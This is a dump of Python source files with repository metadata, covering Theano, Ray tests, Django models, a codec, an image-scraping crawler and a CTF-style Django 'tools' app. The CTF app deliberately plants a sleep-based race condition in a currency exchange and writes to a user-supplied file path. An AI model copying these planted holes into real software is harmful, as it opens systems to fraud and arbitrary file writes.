theano.config.floatX = 'float32'
#theano.config.device = 'gpu'
# initialize
x = T.fmatrix(name='x')
x_sum = T.sum(x, axis=0)
# compile
calc_sum = theano.function(inputs=[x], outputs=x_sum)
# execute (Python List)
ary = [[1, 2, 3], [1, 2, 3]]
print('Column sum:', calc_sum(ary))
# execute (NumPy array)
ary = np.array([[1, 2, 3], [1, 2, 3]],
dtype=theano.config.floatX)
print('Column sum:', calc_sum(ary))
print('TensorType: ', x.type())
|
[
"[email protected]"
] | |
bd82d3e98d1a67cc87a28e599370a8b6475b91ae
|
3467fe90c6c49b4ac86785d1da19d7183b2ac0f5
|
/6002x/findCombination.py
|
85d683714d531ae692f4b2fa142f7782b706f04d
|
[
"MIT"
] |
permissive
|
CarlosEduardoAS/MITx
|
277da453638da672c9946513bfb7a86e7446072b
|
532695d69c77581b6df80c145283b349b75e4973
|
refs/heads/main
| 2023-05-02T13:50:15.283211 | 2021-05-25T20:02:48 | 2021-05-25T20:02:48 | 351,555,645 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,219 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 25 16:10:53 2021
@author: caear
"""
import numpy
import itertools
def find_combination(choices, total):
"""
choices: a non-empty list of ints
total: a positive int
Returns result, a numpy.array of length len(choices)
such that
* each element of result is 0 or 1
* sum(result*choices) == total
* sum(result) is as small as possible
In case of ties, returns any result that works.
If there is no result that gives the exact total,
pick the one that gives sum(result*choices) closest
to total without going over.
"""
power_set = []
for i in itertools.product([1,0], repeat = len(choices)):
power_set.append(numpy.array(i))
filter_set_eq = []
filter_set_less = []
for j in power_set:
if sum(j*choices) == total:
filter_set_eq.append(j)
elif sum(j*choices) < total:
filter_set_less.append(j)
if len(filter_set_eq) > 0:
minidx = min(enumerate(filter_set_eq), key=lambda x:sum(x[1]))[1]
return minidx
else:
minidx = max(enumerate(filter_set_less), key = lambda x:sum(x[1]))[1]
return minidx
|
[
"[email protected]"
] | |
ea385301144e17aa355e09063a6bd7bb66103bb1
|
d7faf47825b6f8e5abf9a9587f1e7248c0eed1e2
|
/python/ray/tests/test_asyncio_cluster.py
|
bea440bdf4b27bb1b625ec135c2bbc2bd5dd6d5b
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
ggdupont/ray
|
7d7c7f39a8f99a09199fab60897da9e48b8e2645
|
15391026c19f1cbbb8d412e46b01f7998e42f2b9
|
refs/heads/master
| 2023-03-12T06:30:11.428319 | 2021-12-07T05:34:27 | 2021-12-07T05:34:27 | 165,058,028 | 0 | 0 |
Apache-2.0
| 2023-03-04T08:56:50 | 2019-01-10T12:41:09 |
Python
|
UTF-8
|
Python
| false | false | 815 |
py
|
# coding: utf-8
import asyncio
import sys
import pytest
import numpy as np
import ray
from ray.cluster_utils import Cluster, cluster_not_supported
@pytest.mark.xfail(cluster_not_supported, reason="cluster not supported")
@pytest.mark.asyncio
async def test_asyncio_cluster_wait():
cluster = Cluster()
head_node = cluster.add_node()
cluster.add_node(resources={"OTHER_NODE": 100})
ray.init(address=head_node.address)
@ray.remote(num_cpus=0, resources={"OTHER_NODE": 1})
def get_array():
return np.random.random((192, 1080, 3)).astype(np.uint8) # ~ 0.5MB
object_ref = get_array.remote()
await asyncio.wait_for(object_ref, timeout=10)
ray.shutdown()
cluster.shutdown()
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
[
"[email protected]"
] | |
adf942ef17cc289e1c3cf16a609ecac205d03692
|
fc314838b18c14a00310f0059d5358c7c4afabd6
|
/special/models.py
|
6796cb77ef4370af265ada4e6ba8966f501a7cd4
|
[
"MIT"
] |
permissive
|
opendream/asip
|
5cb4b997fab2438193ae7490c159efced6dc3d91
|
20583aca6393102d425401d55ea32ac6b78be048
|
refs/heads/master
| 2022-11-28T23:28:18.405604 | 2020-03-10T04:56:23 | 2020-03-10T04:56:23 | 190,504,979 | 1 | 1 |
MIT
| 2022-11-22T01:10:46 | 2019-06-06T03:06:03 |
HTML
|
UTF-8
|
Python
| false | false | 1,126 |
py
|
from django.db import models
# Create your models here.
from common.constants import STATUS_PUBLISHED, STATUS_CHOICES
from common.models import AbstractPermalink, CommonTrashModel
import files_widget
class Special(CommonTrashModel, AbstractPermalink):
title = models.CharField(max_length=512)
image = files_widget.ImageField(verbose_name='Banner Image', null=True, blank=True)
status = models.IntegerField(choices=STATUS_CHOICES, default=STATUS_PUBLISHED)
created = models.DateTimeField(auto_now_add=True, null=True, blank=True)
changed = models.DateTimeField(auto_now=True, null=True, blank=True)
def __unicode__(self):
return self.permalink
def get_absolute_url(self):
return '/%s/' % self.permalink
class Page(CommonTrashModel, AbstractPermalink):
special = models.ForeignKey(Special, related_name='pages', null=True, blank=True)
status = models.IntegerField(choices=STATUS_CHOICES, default=STATUS_PUBLISHED)
created = models.DateTimeField(auto_now_add=True, null=True, blank=True)
changed = models.DateTimeField(auto_now=True, null=True, blank=True)
|
[
"[email protected]"
] | |
dd57282a6f43709922c5f7cbe9ce63f81e77bcd0
|
414db33a43c50a500741784eea627ba98bb63e27
|
/0x0A-python-inheritance/9-rectangle.py
|
4092a9005ebb2873185b2c9b324c123b1c9c6344
|
[] |
no_license
|
rayraib/holbertonschool-higher_level_programming
|
2308ea02bd7f97eae3643e3ce0a6489cc1ad9ff5
|
6b4196eb890ffcb91e541431da9f5f57c5b85d4e
|
refs/heads/master
| 2021-09-14T09:12:26.664653 | 2018-05-11T03:23:12 | 2018-05-11T03:23:12 | 113,070,818 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 746 |
py
|
#!/usr/bin/python3
BaseGeometry = __import__('7-base_geometry').BaseGeometry
'''
subclass of BaseGeometry class
'''
class Rectangle(BaseGeometry):
''' representation of a rectangle'''
def __init__(self, width, height):
'''initialize the object attributes'''
BaseGeometry.integer_validator(self, "height", height)
self.__height = height
BaseGeometry.integer_validator(self, "width", width)
self.__width = width
def area(self):
''' calculate area of the rectangle'''
return (self.__height * self.__width)
def __str__(self):
'''return informal string represention of the object itself'''
return ("[Rectangle] {}/{}".format(self.__width, self.__height))
|
[
"[email protected]"
] | |
902b09ed2ee809a19293ec13b3fccd3cf58d2dbf
|
6ffd23679939f59f0a09c9507a126ba056b239d7
|
/imperative/python/megengine/core/_trace_option.py
|
638c142a12249cc9b7381b3c378d5b01f5b5ff9e
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
MegEngine/MegEngine
|
74c1c9b6022c858962caf7f27e6f65220739999f
|
66b79160d35b2710c00befede0c3fd729109e474
|
refs/heads/master
| 2023-08-23T20:01:32.476848 | 2023-08-01T07:12:01 | 2023-08-11T06:04:12 | 248,175,118 | 5,697 | 585 |
Apache-2.0
| 2023-07-19T05:11:07 | 2020-03-18T08:21:58 |
C++
|
UTF-8
|
Python
| false | false | 862 |
py
|
# -*- coding: utf-8 -*-
import os
from ._imperative_rt.core2 import set_cpp_use_symbolic_shape
_use_symbolic_shape = False
if os.environ.get("MEGENGINE_USE_SYMBOLIC_SHAPE"):
_use_symbolic_shape = True
_use_xla_backend = False
def use_symbolic_shape() -> bool:
r"""Returns whether tensor.shape returns a tensor instead of a tuple"""
return _use_symbolic_shape
def set_symbolic_shape(option: bool):
r"""Sets whether tensor.shape returns a tensor instead of a tuple"""
global _use_symbolic_shape
_org = _use_symbolic_shape
_use_symbolic_shape = option
return _org
def use_xla_backend() -> bool:
return _use_xla_backend
def set_use_xla_backend(option: bool) -> bool:
global _use_xla_backend
_org = _use_xla_backend
_use_xla_backend = option
return _org
set_cpp_use_symbolic_shape(use_symbolic_shape)
|
[
"[email protected]"
] | |
6c54d81e4263105997a4b7dbcb57d4d4673fe0e2
|
5d0fe4a9e026234fe15e6c4380355061bb4dac64
|
/tests/functional/pages/profile/individual_enter_your_email_and_password.py
|
4ed6007a0f1fe073b148c538f8fdceb4a783b69b
|
[
"MIT"
] |
permissive
|
uktrade/directory-tests
|
37e243862da8ac594cf1ea06ade714db5e1aba03
|
39ec6c26203580238e65566a472cbd80916e6726
|
refs/heads/master
| 2022-08-09T16:58:56.248982 | 2022-08-01T12:25:10 | 2022-08-01T12:25:10 | 71,367,747 | 4 | 3 |
MIT
| 2022-08-01T12:26:09 | 2016-10-19T14:48:57 |
Python
|
UTF-8
|
Python
| false | false | 1,702 |
py
|
# -*- coding: utf-8 -*-
"""Profile - Individual - Enter your business email address and set a password"""
from requests import Response, Session
from directory_tests_shared import PageType, Service, URLs
from tests.functional.utils.context_utils import Actor
from tests.functional.utils.request import (
Method,
check_response,
check_url,
make_request,
)
SERVICE = Service.PROFILE
NAME = "Individual enter your email address and set a password"
TYPE = PageType.FORM
URL = URLs.PROFILE_ENROL_INDIVIDUAL_ENTER_YOUR_EMAIL_AND_PASSWORD.absolute
EXPECTED_STRINGS = [
"Enter your email address and set a password",
"Your email address",
"Set a password",
"Confirm password",
"Tick this box to accept the",
]
def go_to(session: Session) -> Response:
return make_request(Method.GET, URL, session=session)
def should_be_here(response: Response):
check_url(response, URL)
check_response(response, 200, body_contains=EXPECTED_STRINGS)
def submit(actor: Actor) -> Response:
session = actor.session
headers = {"Referer": URL}
data = {
"csrfmiddlewaretoken": actor.csrfmiddlewaretoken,
"individual_user_enrolment_view-current_step": "user-account",
"user-account-email": actor.email,
"user-account-password": actor.password,
"user-account-password_confirmed": actor.password,
"user-account-terms_agreed": "on",
"user-account-remote_password_error": None,
"g-recaptcha-response": "test mode",
}
return make_request(
Method.POST,
URL,
session=session,
headers=headers,
files=data,
no_filename_in_multipart_form_data=True,
)
|
[
"[email protected]"
] | |
905cb8c5f6d0197487ae82ee1d0f00475fb00efe
|
2153a7ecfa69772797e379ff5642d52072a69b7c
|
/library/test/test_compiler/sbs_code_tests/70_class.py
|
64ce08233157b32ce3204a302018c8a61bc3d153
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"Python-2.0"
] |
permissive
|
KCreate/skybison
|
a3789c84541f39dc6f72d4d3eb9783b9ed362934
|
d1740e08d8de85a0a56b650675717da67de171a0
|
refs/heads/trunk
| 2023-07-26T04:50:55.898224 | 2021-08-31T08:20:46 | 2021-09-02T19:25:08 | 402,908,053 | 1 | 0 |
NOASSERTION
| 2021-09-03T22:05:57 | 2021-09-03T22:05:57 | null |
UTF-8
|
Python
| false | false | 422 |
py
|
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
class C:
pass
# EXPECTED:
[
LOAD_BUILD_CLASS(0),
LOAD_CONST(Code((1, 0))),
LOAD_CONST('C'),
MAKE_FUNCTION(0),
LOAD_CONST('C'),
CALL_FUNCTION(2),
STORE_NAME('C'),
...,
CODE_START('C'),
LOAD_NAME('__name__'),
STORE_NAME('__module__'),
LOAD_CONST('C'),
STORE_NAME('__qualname__'),
...,
]
|
[
"[email protected]"
] | |
ca882b27134e8b7e97382771cc03bef0fcd2a3fe
|
242f1dafae18d3c597b51067e2a8622c600d6df2
|
/src/1300-1399/1344.angle.clock.py
|
8f16b6ea976d0a6986c2e132b2eb2b95f928c1e3
|
[] |
no_license
|
gyang274/leetcode
|
a873adaa083270eb05ddcdd3db225025533e0dfe
|
6043134736452a6f4704b62857d0aed2e9571164
|
refs/heads/master
| 2021-08-07T15:15:01.885679 | 2020-12-22T20:57:19 | 2020-12-22T20:57:19 | 233,179,192 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 429 |
py
|
class Solution:
def angleClock(self, hour: int, minutes: int) -> float:
h, m = hour % 12, minutes % 60
hA, mA = h * 30 + m / 60 * 30, m * 6
dA = abs(hA - mA)
return min(dA, 360 - dA)
if __name__ == '__main__':
solver = Solution()
cases = [
(2, 58),
]
rslts = [solver.angleClock(hour, minutes) for hour, minutes in cases]
for cs, rs in zip(cases, rslts):
print(f"case: {cs} | solution: {rs}")
|
[
"[email protected]"
] | |
66ebb027ebb9fcf1674157a1fd4328b8c803a1b6
|
60aa3bcf5ace0282210685e74ee8ed31debe1769
|
/base/lib/encodings/cp1253.py
|
e32862ea0e2b0a2d349861903d7635099bf924b3
|
[] |
no_license
|
TheBreadGuy/sims4-ai-engine
|
42afc79b8c02527353cc084117a4b8da900ebdb4
|
865212e841c716dc4364e0dba286f02af8d716e8
|
refs/heads/master
| 2023-03-16T00:57:45.672706 | 2016-05-01T17:26:01 | 2016-05-01T17:26:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,776 |
py
|
import codecs
class Codec(codecs.Codec):
__qualname__ = 'Codec'
def encode(self, input, errors='strict'):
return codecs.charmap_encode(input, errors, encoding_table)
def decode(self, input, errors='strict'):
return codecs.charmap_decode(input, errors, decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
__qualname__ = 'IncrementalEncoder'
def encode(self, input, final=False):
return codecs.charmap_encode(input, self.errors, encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
__qualname__ = 'IncrementalDecoder'
def decode(self, input, final=False):
return codecs.charmap_decode(input, self.errors, decoding_table)[0]
class StreamWriter(Codec, codecs.StreamWriter):
__qualname__ = 'StreamWriter'
class StreamReader(Codec, codecs.StreamReader):
__qualname__ = 'StreamReader'
def getregentry():
return codecs.CodecInfo(name='cp1253', encode=Codec().encode, decode=Codec().decode, incrementalencoder=IncrementalEncoder, incrementaldecoder=IncrementalDecoder, streamreader=StreamReader, streamwriter=StreamWriter)
decoding_table = '\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\ufffe‚ƒ„…†‡\ufffe‰\ufffe‹\ufffe\ufffe\ufffe\ufffe\ufffe‘’“”•–—\ufffe™\ufffe›\ufffe\ufffe\ufffe\ufffe\xa0΅Ά£¤¥¦§¨©\ufffe«¬\xad®―°±²³΄µ¶·ΈΉΊ»Ό½ΎΏΐΑΒΓΔΕΖΗΘΙΚΛΜΝΞΟΠΡ\ufffeΣΤΥΦΧΨΩΪΫάέήίΰαβγδεζηθικλμνξοπρςστυφχψωϊϋόύώ\ufffe'
encoding_table = codecs.charmap_build(decoding_table)
|
[
"[email protected]"
] | |
82a31547b7df987e69677a23ad29f56ad9a5ccbe
|
41c5f7da28b87a3034754254d21791b322e819d8
|
/test/test_json_analysis_result_sub_group_all_of.py
|
e181c4639ce155f9ebebe587db93934f73ee12ae
|
[] |
no_license
|
MADANA-IO/madana-apiclient-python
|
16cb3eb807897903df2a885a94a2c02fc405818a
|
40dc21ab43d9565ac3dff86d7270093cce112753
|
refs/heads/master
| 2023-03-08T05:02:32.616469 | 2021-02-11T10:17:30 | 2021-02-11T10:17:30 | 287,797,297 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,151 |
py
|
# coding: utf-8
"""
madana-api
<h1>API Quickstart Guide</h1> <p>This documentation contains a Quickstart Guide, a few <a href=\"downloads.html\">sample clients</a> for download and information about the available <a href=\"resources.html\">endpoints</a> and <a href=\"data.html\">DataTypes</a> </p> <p>The <a target=\"_blank\" href=\"http://madana-explorer-staging.eu-central-1.elasticbeanstalk.com/login\"> MADANA Explorer</a> can be used to verify the interactions with the API</p> <p>Internal use only. For more information visit <a href=\"https://www.madana.io\">www.madana.io</a></p> <br> <br> # noqa: E501
The version of the OpenAPI document: 0.4.12
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import madana_sampleclient_python
from madana_sampleclient_python.models.json_analysis_result_sub_group_all_of import JsonAnalysisResultSubGroupAllOf # noqa: E501
from madana_sampleclient_python.rest import ApiException
class TestJsonAnalysisResultSubGroupAllOf(unittest.TestCase):
"""JsonAnalysisResultSubGroupAllOf unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test JsonAnalysisResultSubGroupAllOf
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = madana_sampleclient_python.models.json_analysis_result_sub_group_all_of.JsonAnalysisResultSubGroupAllOf() # noqa: E501
if include_optional :
return JsonAnalysisResultSubGroupAllOf(
filter = '0'
)
else :
return JsonAnalysisResultSubGroupAllOf(
)
def testJsonAnalysisResultSubGroupAllOf(self):
"""Test JsonAnalysisResultSubGroupAllOf"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
a3107b0c1a2da9aed5839d1306f79a2aa6a91e03
|
0d2f636592dc12458254d793f342857298c26f12
|
/vowel.py
|
d1da799f259f873b5637804df56c23b3325a671c
|
[] |
no_license
|
chenpc1214/test
|
c6b545dbe13e672f11c58464405e024394fc755b
|
8610320686c499be2f5fa36ba9f11935aa6d657b
|
refs/heads/master
| 2022-12-13T22:44:41.256315 | 2020-09-08T16:25:49 | 2020-09-08T16:25:49 | 255,796,035 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 136 |
py
|
vowel = ['a', 'e', 'i', 'o', 'u']
word= "milliway"
for letter in word:
if letter in vowel:
print(letter)
|
[
"[email protected]"
] | |
c2e4537265eacfee364c3be61266d0a16861c951
|
dc39ccc50b7d34e5de84f3cc132c5cc096a32656
|
/BASIC/class/attribute.py
|
40377cc862a0cdd596c36046d3178d5438bfeccf
|
[] |
no_license
|
Shukladas1115/Python
|
0947aefd62a9ce4c3140360cb7259b031368709c
|
feb32bc2e2e7df377fc2d92330bfdacb83f31a55
|
refs/heads/master
| 2022-02-20T04:15:56.036495 | 2019-08-26T16:36:52 | 2019-08-26T16:36:52 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 442 |
py
|
class A(object):
x = 1
class B(A):
pass
class C(A):
pass
print(A.x, B.x, C.x) # 1 1 1
B.x = 2
print(A.x, B.x, C.x) # 1 2 1
A.x = 3
print(A.x, B.x, C.x) # 3 2 3 tại sao vậy?
'''
C doesn’t have its own x property, independent of A.
Thus, references to C.x are in fact references to A.x
C kế thừa từ A, C không thực sự sở hữu thuộc tính x mà nó tham chiếu đến thuộc tính x của A
'''
|
[
"[email protected]"
] | |
fa36d96624f3655b5258367533c44b0c14db498b
|
d364123a0655bff7e9d725382934fe2c15b5bfc4
|
/Crawler/lianxi/hsimg_test.py
|
bc62fc7c1c354c4ba3007bd3c78507f7a0a83c1e
|
[] |
no_license
|
yuan1093040152/SeleniumTest
|
88d75361c8419354f56856c326f843a0a89d7ca6
|
d155b98702bc46c174499042b43257696b861b5e
|
refs/heads/master
| 2023-08-31T15:00:25.415642 | 2023-08-30T09:26:42 | 2023-08-30T09:26:42 | 227,269,300 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,271 |
py
|
#coding=utf-8
'''
Created on 2018年7月15日
@author: kai.yangf
'''
import requests,re,time
from multiprocessing import pool
from requests.exceptions import RequestException
from threading import Thread
def get_one_page(url):
try:
response = requests.get(url)
html = response.text
if response.status_code == 200:
print (True)
print (html[:5])
return html
else:
return None
except RequestException:
return None
def parse_one_page(url):
html = get_one_page(url)
pettern = re.compile('<img.*?alt.*?src="(.*?)" />',re.S)
items = re.findall(pettern,html)
print (len(items))
for item in items:
writeIO(item)
def writeIO(item):
filename = str(time.time()) + '.jpg'
response = requests.get(item)
Path = 'E:\\CrawlerImg\\' + filename
with open(Path,'wb') as f:
f.write(response.content)
f.close()
def each_page(url):
host = 'https://www.8484dd.com'
html = get_one_page(url)
pettern = re.compile('<li.*?<a.*?href="(.+?)".*?</a>',re.S)
items = re.findall(pettern,html)
print (len(items))
for item in items:
if re.match('/pic', item):
if re.search('.html', item):
url = host + item
parse_one_page(url)
def each_page_value(i):
url = 'https://www.8484dd.com/pic/5/index_'+ str(i) +'.html'
host = 'https://www.8484dd.com'
html = get_one_page(url)
pettern = re.compile('<li.*?<a.*?href="(.+?)".*?</a>',re.S)
items = re.findall(pettern,html)
print (len(items))
for item in items:
if re.match('/pic', item):
if re.search('.html', item):
url = host + item
parse_one_page(url)
def main(url):
html = get_one_page(url)
parse_one_page(html)
if __name__ == '__main__':
# for i in range(2,10):
# url = 'https://www.8484dd.com/pic/5/index_'+ str(i) +'.html'
# each_page(url)
Threads = []
for i in range(2,11):
t = Thread(target=each_page_value, args =(i,))
Threads.append(t)
for i in range(2,11):
Threads[i].start()
for i in range(2,11):
Threads[i].join()
|
[
"[email protected]"
] | |
f4c38240821bf96e65612f342986cf276694f90d
|
34578a08451dc124f02fbba92a219da3347059cd
|
/.history/tools/views_20190502130213.py
|
5ef8462e7964c7373832387076323b91f3acac43
|
[] |
no_license
|
gwjczwy/CTF-Exercises
|
b35d938b30adbc56c1b6f45dc36cea1421c702fb
|
c2d5c47f5047b1601564453e270ce50aad7f56fc
|
refs/heads/master
| 2020-05-25T23:51:26.190350 | 2019-05-22T13:18:59 | 2019-05-22T13:18:59 | 188,042,255 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,399 |
py
|
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from json import dumps
from .models import Url,Money
import time
#########################
#配置变量
sourcePath=r'C:\Users\arnoux\Desktop\训练平台\sql\log.txt'
#########################
#主页
@login_required
def index(requests):
data={'toolname':'index','user':requests.user}
return render(requests,'tools/index.html',data)
#########################
#短链接
@login_required
def surl(requests):#短链接 index
data={}
data['toolName']="surl"
data['parameter']="index"
return render(requests, 'tools/index.html', data)
def surls(requests,parameter):#带参数的短链接跳转
data={}
data['toolName']="surl"
data['parameter']="link"
print('短链接参数',parameter)
try:
req=Url.objects.get(sUrl=parameter)
print('获取对象成功')
except:
return HttpResponse('你来错地方了,悟空')
req=req.fullUrl
return HttpResponse('<script>window.location.href="'+req+'";</script>')
@csrf_exempt
@login_required
def createSUrl(requests):
if not (requests.method == 'POST' and requests.POST['fullUrl']):
req={'message':'fail'}
return HttpResponse(dumps(req),content_type="application/json")
fullUrl=requests.POST['fullUrl']
while True:
randUrl=randStr(5)#随机长度为5的字符串
try:
Url.objects.get(sUrl=randUrl)#如果重复就继续随机
print('再!来!一!次!')
except:
break
randUrl=randStr(5)
Url(sUrl=randUrl,fullUrl=fullUrl).save()
req={'message':'success','url':randUrl}
return HttpResponse(dumps(req),content_type="application/json")
def randStr(l):
import random
import string
seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
sa = []
for i in range(l):
sa.append(random.choice(seed))
salt = ''.join(sa)
return salt
#########################
#商店
@login_required
def shop(requests):
data={}
data['toolName']="shop"
money = Money.objects.get(user=requests.user)
data['money']=money
return render(requests, 'tools/index.html', data)
#商店兑换
@csrf_exempt
@login_required
def shopExchange(requests):
if not (requests.method == 'POST' and 'rule' in requests.POST and 'num' in requests.POST):
print('非法请求')
req={'message':'fail','reason':'非法请求'}
return HttpResponse(dumps(req),content_type="application/json")
rule=requests.POST['rule']
num=requests.POST['num']
if not rule in ['m2b','b2m']:# 判断转换规则是否合法
print('rule参数不合法')
req={'message':'fail','reason':'rule参数不合法'}
return HttpResponse(dumps(req),content_type="application/json")
if num.isdigit():# 判断数字是否合法
num=int(num)
if num<0:
req={'message':'fail','reason':'非法参数'}
return HttpResponse(dumps(req),content_type="application/json")
else:
req={'message':'fail','reason':'非法参数'}
return HttpResponse(dumps(req),content_type="application/json")
# 获取货币对象
money = Money.objects.get(user=requests.user)
if rule=='m2b':
if money.monero>=num:
money.bitcoin+=num
money.save()
time.sleep(5) #等待时间 造成条件竞争
money.monero-=num
money.save()
else:
req={'message':'fail','reason':'monero 不足'}
return HttpResponse(dumps(req),content_type="application/json")
elif rule=='b2m':
if money.bitcoin>=num:
money.monero+=num
money.save()
time.sleep(5)
money.bitcoin-=num
money.save()
else:
req={'message':'fail','reason':'bitcoin 不足'}
return HttpResponse(dumps(req),content_type="application/json")
else:
req={'message':'fail','reason':'未知错误'}
return HttpResponse(dumps(req),content_type="application/json")
req={'message':'success','monero':money.monero,'bitcoin':money.bitcoin}
return HttpResponse(dumps(req),content_type="application/json")
#########################
#日志
@login_required
def logs(requests):
data={}
data['toolName']="logs"
return render(requests, 'tools/index.html', data)
# 添加日志
@csrf_exempt
@login_required
def addLog(requests):
if not (requests.method == 'POST' and 'path' in requests.POST and 'content' in requests.POST):
req={'message':'fail','reason':'非法请求'}
return HttpResponse(dumps(req),content_type="application/json")
path=requests.POST['path']
content=requests.POST['content']
# 获取货币对象
money = Money.objects.get(user=requests.user)
if money.bitcoin >=100:
try:
with open(path,'at') as file:
file.write(content)
money.bitcoin-=100
money.save()
req={'message':'success','reason':'操作成功'}
return HttpResponse(dumps(req),content_type="application/json")
except:
req={'message':'fail','reason':'写入文件错误'}
return HttpResponse(dumps(req),content_type="application/json")
else:
req={'message':'fail','reason':'货币不足'}
return HttpResponse(dumps(req),content_type="application/json")
# 获取日志
def getLog(requests):
req={'message':'fail','reason':'货币不足'}
return HttpResponse(dumps(req),content_type="application/json")
#下载源代码
def downSource(requests):
# 获取货币对象
money = Money.objects.get(user=requests.user)
if money.bitcoin >=1000:
money.bitcoin-=1000
money.save()
file = open(sourcePath, 'rb')
response = HttpResponse(file)
response['Content-Type'] = 'application/octet-stream' #设置头信息,告诉浏览器这是个文件
response['Content-Disposition'] = 'attachment;filename="'+sourcePath.split('\\')[-1]+'";'
return response
else:
req={'message':'fail','reason':'货币不足'}
return HttpResponse(dumps(req),content_type="application/json")
|
[
"[email protected]"
] | |
31f64762cb63b1fbd9b34933a297a9ed4438eddb
|
ffad0de28109d0156baba92b5793e6d8142ced7c
|
/server/channels_list_test.py
|
84b54743e63a3c4deed2798a8d9a3f3a3ced6293
|
[] |
no_license
|
nomii15/COMP1531-server
|
823753e11b78619b7f67c32d9f5f1f39d839b6f8
|
af00ba90cdf2fa1ce5170a7a2bf506bfe550bbd7
|
refs/heads/master
| 2021-07-17T08:26:57.074709 | 2019-11-17T07:29:44 | 2019-11-17T07:29:44 | 228,518,923 | 1 | 0 | null | 2021-01-05T18:13:55 | 2019-12-17T02:47:02 |
Python
|
UTF-8
|
Python
| false | false | 1,550 |
py
|
import pytest
from channels_list import channels_list
from auth_register import auth_register
from channels_create import channels_create
'''
Provide a list of all channels (and their associated details) that the authorised user is part of
'''
def test_list_one():
#setup
register1 = auth_register("[email protected]", "validpassword1", "USER1", "validname1")
token1 = register1['token']
u_id1 = register1['u_id']
channel_id1 = channels_create(token1, 'channel1', True)
channel_list1 = channels_list(token1)
channel_list = {'channels': [{'channel_id': 1, 'name': 'channel1'}]}
#check only channel user is part of exists in the list
assert channel_list == channel_list1
def test_list_empty():
#setup
register2 = auth_register("[email protected]", "validpassword2", "USER2", "validname2")
token2 = register2['token']
u_id2 = register2['u_id']
register3 = auth_register("[email protected]", "validpassword3", "USER3", "validname3")
token3 = register3['token']
u_id3 = register3['u_id']
register4 = auth_register("[email protected]", "validpassword4", "USER4", "validname4")
token4 = register4['token']
u_id4 = register4['u_id']
channel_id2 = channels_create(token2, 'channel2', True)
channel_id3 = channels_create(token3, 'channel3', True)
channel_list4 = channels_list(token4)
empty_list = {'channels' : []}
#check channel list is empty as user does not belong to any channels
assert channel_list4 == empty_list
|
[
"[email protected]"
] | |
a4aa71959c2f1c3dce79168ddb51c85bfaa1899c
|
cdee5cc20a5085b40f8555e7199fe19403e005c3
|
/experimental/graphicalClassification/MultiClassMajorityVote.py
|
e02402ed226105cb3faf7d5e5aab05424c9616b6
|
[
"Apache-2.0"
] |
permissive
|
visenger/aggregation
|
1e908d11df701e900d94d6545f3cc35a6c7dc915
|
82dce87eaaf14b0b2bedd29fc82c026fda2a0138
|
refs/heads/master
| 2020-03-19T03:08:52.140663 | 2017-06-21T10:32:27 | 2017-06-21T10:32:27 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 638 |
py
|
#!/usr/bin/env python
from __future__ import print_function
__author__ = 'greghines'
class MultiClassMajorityVote:
def __init__(self,subjectNodes,userNodes):
self.subjectNodes = subjectNodes
self.userNodes = userNodes
self.alpha = 0.6
def __classify__(self,attributeList):
for att in attributeList:
for user in self.userNodes:
user.__changeClassificationAttributes__(att)
for subject in self.subjectNodes:
subject.__changeClassificationAttributes__(att)
#what alpha value would this subject need to get correct positive?
|
[
"[email protected]"
] | |
a2e495fdc47015c860dc2e716dfa6d8a401a6538
|
0b40232eb2395c27353c892ef4ccb5c604bb75be
|
/Array/third_max.py
|
174029680ba012a49f9c34cb0d61196da859ba00
|
[] |
no_license
|
HareshNasit/LeetCode
|
971ae9dd5e4f0feeafa5bb3bcf5b7fa0a514d54d
|
674728af189aa8951a3fcb355b290f5666b1465c
|
refs/heads/master
| 2021-06-18T07:37:40.121698 | 2021-02-12T12:30:18 | 2021-02-12T12:30:18 | 168,089,751 | 5 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 366 |
py
|
def thirdMax(self, nums):
"""
https://leetcode.com/problems/third-maximum-number/submissions/
:type nums: List[int]
:rtype: int
"""
nums_set = set(nums)
nums_list = list(nums_set)
nums_list.sort(reverse = True)
if len(nums_list) > 2:
return nums_list[2]
return nums_list[0]
|
[
"[email protected]"
] | |
39ddeb9ad873ed4901adbf3640031f907f3503a3
|
2b5bc632859ca01b6b2feae6186b1314ed8c5187
|
/everpad/provider/daemon.py
|
5b6b49be3c92f2d0a2ee5e6669c92c7f6b8189b9
|
[] |
no_license
|
mcardillo55/everpad
|
c64e2d35bd4ccceff901d9720030dbb8adfcef56
|
